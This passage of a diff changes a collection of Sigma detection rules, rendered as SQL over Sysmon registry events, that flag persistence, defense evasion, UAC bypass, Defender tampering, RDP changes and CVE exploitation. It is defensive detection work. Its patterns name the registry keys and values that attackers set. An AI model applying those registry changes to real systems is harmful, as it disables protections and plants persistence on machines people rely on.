LIKE '%mshtml,%' ESCAPE '\\' OR Details LIKE '%RunHTMLApplication%' ESCAPE '\\' OR Details LIKE '%Execute(%' ESCAPE '\\' OR Details LIKE '%CreateObject%' ESCAPE '\\' OR Details LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (Details LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR Details LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" ], - "filename": "registry_set_taskcache_entry.yml" + "filename": "registry_set_vbs_payload_stored.yml" }, { - "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", - "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "title": "WinSock2 Autorun Keys Modification", + "id": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", "status": "test", - "description": "Detects 
a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", - "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ "attack.persistence", - "attack.execution", - "attack.defense_evasion", - "attack.t1112" + "attack.t1547.001" ], "falsepositives": [ - "New printer port install on host" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.com%' ESCAPE '\\' OR Details LIKE '%C:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WinSock2\\\\Parameters%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Protocol\\_Catalog9\\\\Catalog\\_Entries%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NameSpace\\_Catalog5\\\\Catalog\\_Entries%' ESCAPE '\\')) AND NOT (Details = '(Empty)' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\MsiExec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\'))" ], - "filename": "registry_set_cve_2020_1048_new_printer_port.yml" + "filename": "registry_set_asep_reg_keys_modification_winsock2.yml" }, { - "title": "Persistence Via Hhctrl.ocx", 
- "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", + "title": "Disabled RestrictedAdminMode For RDS", + "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", "status": "experimental", - "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" - ], - "filename": "registry_set_hhctrl_persistence.yml" - }, - { - "title": "Suspicious Keyboard Layout Load", - "id": "34aa0252-6039-40ff-951f-939fd6ce47d8", - "status": "test", - "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. 
Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ], - "falsepositives": [ - "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Keyboard Layout\\\\Preload\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Keyboard Layout\\\\Substitutes\\\\%' ESCAPE '\\') AND (Details LIKE '%00000429%' ESCAPE '\\' OR Details LIKE '%00050429%' ESCAPE '\\' OR Details LIKE '%0000042a%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "registry_set_susp_keyboard_layout_load.yml" + "filename": "registry_set_lsa_disablerestrictedadmin.yml" }, { - "title": "Classes Autorun Keys Modification", - "id": "9df5f547-c86a-433e-b533-f2794357e242", + "title": "Change User Account Associated with the FAX Service", + "id": "e3fdf743-f05b-4051-990a-b66919be1743", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate software automatically (mostly, during 
installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\Shellex\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Exefile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Classes\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.cmd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (Details = '{807583E5-5146-11D5-A672-00B0D022E945}') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\lnkfile\\\\shellex\\\\ContextMenuHandlers\\\\%' ESCAPE '\\')))" + 
"SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (Details LIKE '%NetworkService%' ESCAPE '\\'))" ], - "filename": "registry_set_asep_reg_keys_modification_classes.yml" + "filename": "registry_set_fax_change_service_user.yml" }, { - "title": "Execution DLL of Choice Using WAB.EXE", - "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", + "title": "Enable Microsoft Dynamic Data Exchange", + "id": "63647769-326d-4dde-a419-b925cc0caf42", "status": "test", - "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", - "author": "oscd.community, Natalia Shornikova", + "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1559.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (Details LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\Word\\\\Security\\\\AllowDDE' ESCAPE '\\' AND Details IN ('DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLaunch' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLookup' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" ], - "filename": 
"registry_set_wab_dllpath_reg_change.yml" + "filename": "registry_set_office_enable_dde.yml" }, { - "title": "Service Binary in Uncommon Folder", - "id": "277dc340-0540-42e7-8efb-5ff460045e07", - "status": "experimental", - "description": "Detect the creation of a service with a service binary located in a uncommon directory", - "author": "Florian Roth (Nextron Systems)", + "title": "RDP Sensitive Settings Changed to Zero", + "id": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", + "status": "test", + "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.\n", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", + "attack.persistence", "attack.t1112" ], "falsepositives": [ - "Unknown" + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\') AND Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\') OR (Details LIKE 
'%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%\\\\fDenyTSConnections' ESCAPE '\\' OR TargetObject LIKE '%\\\\fSingleSessionPerUser' ESCAPE '\\' OR TargetObject LIKE '%\\\\UserAuthentication' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "registry_set_creation_service_uncommon_folder.yml" + "filename": "registry_set_terminal_server_suspicious.yml" }, { - "title": "Add Debugger Entry To Hangs Key For Persistence", - "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "title": "Potential Signing Bypass Via Windows Developer Features - Registry", + "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", "status": "experimental", - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", + "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". 
Which allows the user to install untrusted packages.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion" ], "falsepositives": [ - "This value is not set by default but could be rarly used by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "registry_set_hangs_debugger_persistence.yml" + "filename": "registry_set_turn_on_dev_features.yml" }, { - "title": "New DNS ServerLevelPluginDll Installed", - "id": "e61e8a88-59a9-451c-874e-70fcc9740d67", + "title": "Potential PendingFileRenameOperations Tamper", + "id": "4eec988f-7bf0-49f1-8675-1e6a510b3a2a", "status": "experimental", - "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect changes to the \"PendingFileRenameOperations\" registry key from uncommon or suspicious images lcoations to stage currently used files for rename after reboot.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + 
"Installers and updaters may set currently in use files for rename after a reboot." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\services\\\\DNS\\\\Parameters\\\\ServerLevelPluginDll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\PendingFileRenameOperations%' ESCAPE '\\') AND ((Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regedit.exe' ESCAPE '\\')))" ], - "filename": "registry_set_dns_server_level_plugin_dll.yml" + "filename": "registry_set_susp_pendingfilerenameoperations.yml" }, { - "title": "Hiding User Account Via SpecialAccounts Registry Key", - "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", + "title": "Registry Hide Function from User", + "id": "5a93eb65-dffa-4543-b761-94aa60098fb6", "status": "test", - "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1564.002" + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate admin script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 
'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideClock' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAHealth' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCANetwork' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAPower' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAVolume' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowInfoTip' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowCompColor' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" ], - "filename": "registry_set_special_accounts.yml" + "filename": "registry_set_hide_function_user.yml" }, { - "title": "Disable Windows Defender Functionalities Via Registry Keys", - "id": "0eb46774-f1ab-4a74-8238-1155855f2263", + "title": "Disable Internal Tools or Feature in Registry", + "id": "e2482f8d-3443-4237-b906-cc145d87a076", "status": "experimental", - "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", - "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", + "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses 
this technique)", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1112" ], "falsepositives": [ - "Administrator actions" + "Legitimate admin script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableRegistryTools' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\DisableCMD' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableTaskmgr' ESCAPE '\\' OR 
TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Explorer\\\\DisableNotificationCenter' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableChangePassword' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableLockWorkstation' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\StartMenuLogOff' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\shutdownwithoutlogon' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\ConsentPromptBehaviorAdmin' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PushNotifications\\\\ToastEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Storage\\\\Write Protection' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\StorageDevicePolicies\\\\WriteProtect' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" ], - "filename": "registry_set_windows_defender_tamper.yml" + "filename": "registry_set_disable_function_user.yml" }, { - "title": "PowerShell as a Service in Registry", - "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "title": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)", + "id": "2d9403d5-7927-46b7-8216-37ab7c9ec5e3", "status": "test", - "description": "Detects that a powershell code is written to the registry as a service.", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.", + "author": "Sittikorn S", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + 
"attack.t1221" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKCR\\\\ms-msdt\\\\%' ESCAPE '\\')" ], - "filename": "registry_set_powershell_as_service.yml" + "filename": "registry_set_cve_2022_30190_msdt_follina.yml" }, { - "title": "Outlook Macro Execution Without Warning Setting Enabled", - "id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", - "status": "test", - "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", - "author": "@ScoubiMtl", + "title": "Potential Persistence Via CHM Helper DLL", + "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "status": "experimental", + "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject 
LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" ], - "filename": "registry_set_office_outlook_enable_macro_execution.yml" + "filename": "registry_set_persistence_chm.yml" }, { - "title": "Bypass UAC Using DelegateExecute", - "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", - "status": "test", - "description": "Bypasses User Account Control using a fileless method", - "author": "frack113", + "title": "New DNS ServerLevelPluginDll Installed", + "id": "e61e8a88-59a9-451c-874e-70fcc9740d67", + "status": "experimental", + "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1548.002" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND Details = '(Empty)')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\services\\\\DNS\\\\Parameters\\\\ServerLevelPluginDll' ESCAPE '\\')" ], - "filename": "registry_set_bypass_uac_using_delegateexecute.yml" + "filename": "registry_set_dns_server_level_plugin_dll.yml" }, { - "title": "CurrentVersion NT Autorun Keys Modification", - "id": "cbf93e5d-ca6c-4722-8bea-e9119007c248", + "title": "Common Autorun Keys Modification", + "id": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", "status": "experimental", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, 
oscd.community, Tim Shelton, frack113 (split)", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)", "tags": [ "attack.persistence", "attack.t1547.001" 
